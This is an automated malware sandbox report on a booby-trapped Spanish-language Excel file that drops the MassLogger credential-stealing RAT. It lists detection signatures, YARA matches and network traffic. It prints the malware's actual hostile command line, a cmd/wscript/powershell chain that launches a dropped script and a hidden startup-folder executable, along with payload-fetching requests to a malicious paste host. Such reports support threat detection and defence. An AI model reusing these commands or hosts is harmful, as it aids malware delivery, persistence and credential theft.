Play interactive tour

Edit tour

Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name:	LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID:	356267
MD5:	8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:	61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:	35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags:	ESPgeoOutlookxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0 MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected MassLogger RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the startup folder

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found obfuscated Excel 4.0 Macro

Machine Learning detection for dropped file

May check the online IP address of the machine

Office process drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Yara detected Beds Obfuscator

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 7032 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

a.exe (PID: 6200 cmdline: C:\PROGRAMDATA\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

cmd.exe (PID: 6632 cmdline: cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 2860 cmdline: timeout 4 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

wscript.exe (PID: 4180 cmdline: 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

powershell.exe (PID: 5596 cmdline: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

a.exe (PID: 6772 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 5508 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 740 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe' MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 6072 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

a.exe (PID: 5036 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe MD5: 7D9D8812398EAF9AC0D85E728BBF8637)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xfc8d:$op1: 04 1E FE 02 04 16 FE 01 60 0xfb72:$op2: 00 17 03 1F 20 17 19 15 28 0x1030c:$op3: 00 04 03 69 91 1B 40 0x11a0b:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x84d:$op1: 04 1E FE 02 04 16 FE 01 60 0x732:$op2: 00 17 03 1F 20 17 19 15 28 0xecc:$op3: 00 04 03 69 91 1B 40 0x25cb:$op3: 00 04 03 69 91 1B 40
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xcc8d:$op1: 04 1E FE 02 04 16 FE 01 60 0xcb72:$op2: 00 17 03 1F 20 17 19 15 28 0xd30c:$op3: 00 04 03 69 91 1B 40 0xea0b:$op3: 00 04 03 69 91 1B 40
00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x133c2d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133b12:$op2: 00 17 03 1F 20 17 19 15 28 0x1342ac:$op3: 00 04 03 69 91 1B 40 0x1359ab:$op3: 00 04 03 69 91 1B 40
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x917d:$op1: 04 1E FE 02 04 16 FE 01 60 0x9062:$op2: 00 17 03 1F 20 17 19 15 28 0x97fc:$op3: 00 04 03 69 91 1B 40 0xaefb:$op3: 00 04 03 69 91 1B 40
00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x133c2d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133b12:$op2: 00 17 03 1F 20 17 19 15 28 0x1342ac:$op3: 00 04 03 69 91 1B 40 0x1359ab:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x10c8d:$op1: 04 1E FE 02 04 16 FE 01 60 0x10b72:$op2: 00 17 03 1F 20 17 19 15 28 0x1130c:$op3: 00 04 03 69 91 1B 40 0x12a0b:$op3: 00 04 03 69 91 1B 40
00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x917d:$op1: 04 1E FE 02 04 16 FE 01 60 0x9062:$op2: 00 17 03 1F 20 17 19 15 28 0x97fc:$op3: 00 04 03 69 91 1B 40 0xaefb:$op3: 00 04 03 69 91 1B 40
0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x133c2d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133b12:$op2: 00 17 03 1F 20 17 19 15 28 0x1342ac:$op3: 00 04 03 69 91 1B 40 0x1359ab:$op3: 00 04 03 69 91 1B 40
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x84d:$op1: 04 1E FE 02 04 16 FE 01 60 0x732:$op2: 00 17 03 1F 20 17 19 15 28 0xecc:$op3: 00 04 03 69 91 1B 40 0x25cb:$op3: 00 04 03 69 91 1B 40
00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5036	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 5036	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: a.exe PID: 6200	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: a.exe PID: 6200	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 6200	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5508	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 5508	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 5508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: a.exe PID: 6772	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: a.exe PID: 6772	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 6772	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a.exe PID: 740	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Process Memory Space: a.exe PID: 740	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: a.exe PID: 740	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 50 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.a.exe.39bc1e0.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.39bc1e0.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3a9c1e0.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3a9c1e0.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.6e20000.4.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
1.2.a.exe.3a9c240.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.3a9c240.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3bbc1e0.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
17.2.a.exe.3bbc1e0.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3bbc1e0.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.7530000.5.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.3a89990.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x13329d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133182:$op2: 00 17 03 1F 20 17 19 15 28 0x13391c:$op3: 00 04 03 69 91 1B 40 0x13501b:$op3: 00 04 03 69 91 1B 40
17.2.a.exe.3a89990.1.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.3a89990.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3a89990.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3a9c1e0.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
11.2.a.exe.3a9c1e0.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3a9c1e0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.3889990.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x13329d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133182:$op2: 00 17 03 1F 20 17 19 15 28 0x13391c:$op3: 00 04 03 69 91 1B 40 0x13501b:$op3: 00 04 03 69 91 1B 40
1.2.a.exe.3889990.2.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
1.2.a.exe.3889990.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.3889990.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
20.2.a.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
20.2.a.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
20.2.a.exe.400000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3b7c240.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
11.2.a.exe.3b7c240.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3b7c240.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.a.exe.3969990.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x13329d:$op1: 04 1E FE 02 04 16 FE 01 60 0x133182:$op2: 00 17 03 1F 20 17 19 15 28 0x13391c:$op3: 00 04 03 69 91 1B 40 0x13501b:$op3: 00 04 03 69 91 1B 40
11.2.a.exe.3969990.2.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.3969990.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3969990.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3a89990.1.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.7590000.5.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.3969990.2.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.3b7c240.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.a.exe.3b7c240.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.39bc1e0.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
1.2.a.exe.39bc1e0.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.39bc1e0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3c9c240.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3c9c240.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.3c9c240.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
17.2.a.exe.3c9c240.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3c9c240.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.3a9c240.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
1.2.a.exe.3a9c240.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.a.exe.3a9c240.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.a.exe.7590000.5.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
13.2.a.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa4d:$op1: 04 1E FE 02 04 16 FE 01 60 0x932:$op2: 00 17 03 1F 20 17 19 15 28 0x10cc:$op3: 00 04 03 69 91 1B 40 0x27cb:$op3: 00 04 03 69 91 1B 40
13.2.a.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.a.exe.400000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.6e20000.4.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
17.2.a.exe.3bbc1e0.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
17.2.a.exe.3bbc1e0.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.a.exe.3889990.2.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
11.2.a.exe.7530000.5.raw.unpack	JoeSecurity_BedsObfuscator	Yara detected Beds Obfuscator	Joe Security
Click to see the 52 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://pastex.pro

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\a.exe	ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\a.exe	Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\PROGRAMDATA\a.exe			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: mensajeria_system[1].exe.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\ProgramData\a.exe

Jump to behavior

Source: global traffic

DNS query: name: www.seyranikenger.com.tr

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 54.225.220.115 54.225.220.115
Source: Joe Sandbox View	IP Address: 54.225.220.115 54.225.220.115

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1Host: pastex.proConnection: Keep-Alive

Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp

String found in binary or memory: fUsage: https://www.youtube.com/watch?v=Qxk6cu21JSg equals www.youtube.com (Youtube)

Source: unknown

